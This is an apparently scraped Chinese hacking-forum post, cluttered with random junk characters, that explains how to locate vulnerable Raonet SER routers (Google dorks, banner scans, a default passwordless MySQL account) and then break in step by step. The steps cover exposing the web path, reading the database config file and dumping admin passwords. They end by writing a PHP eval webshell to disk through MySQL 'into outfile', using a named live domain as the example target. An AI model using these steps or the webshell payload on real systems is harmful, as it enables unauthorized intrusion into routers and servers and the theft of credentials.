寻找存在漏洞的路由器方法:+ q- D$ f3 G& R/ f' C" l9 b* \& l6 I
$ _5 v o$ V' d( ^# O% s1:google搜索'Raonet Subscriber Ethernet Router'4 }, g0 q* n" S- X
$ S+ q( \" B% S% w( W* r2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
6 A5 g3 ?3 E; ?
\9 f4 }3 {7 [8 P" N+ N- o$ S3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
6 R+ l6 g+ a. I9 @* C9 h
6 k& r5 h; P/ G6 g$ l- U! W//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
( g. v- v: M* i3 f1 ]* |) d3 }6 Q1 h% Y
! ]4 h- h+ L9 p; w2 \/ P* N
y2 D) e% B. {" W9 P' J
入侵步骤:6 \8 w4 y7 d& @# w- S! U
9 K, _- |: f: V9 x) i: o, Y+ ~1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
* ^1 o F6 x: c4 h
# }: s X% H/ y1 h; j0 [2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc6 R" Z7 |: U, v' r
3:得到密码后连接,查看GUI管理密码:
$ l6 \2 `5 O( j; B& ~0 ?! y( \, n6 huse ser_500/ U1 w7 L& B. U2 { w/ c# V8 `( H
select id,passwd from user;
$ t/ h# z( B' E- U7 E9 M2 u4:通过数据库写入webshell,执行命令:
* \$ W9 f% G0 J0 M7 D& T* d3 F4 tuse mysql;
/ y9 O/ w6 |& x" u. _9 L9 o4 }8 jcreate table ok(cmd TEXT);
# J( K8 ]! _6 y5 L0 f1 q5 B& l6 yinsert into ok values("<?php @eval($_POST[cmd])?>");3 ]1 v" Y, e9 W' X3 ^/ e9 F( t
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
" a4 J2 C5 ^0 y2 B: wdrop table ok;6 @8 V& r9 i* o* S$ @
, v4 D; s4 Z& r4 m5 H- ?+ ~
5:连接后门shell.php , [+ f2 c, F9 t2 A& ]( R
: G; n+ Y* J e n2 s9 ]7 M6. 搞定!
: Y$ l' P# u0 D9 T" ?
$ g1 }- f. K+ G2 { |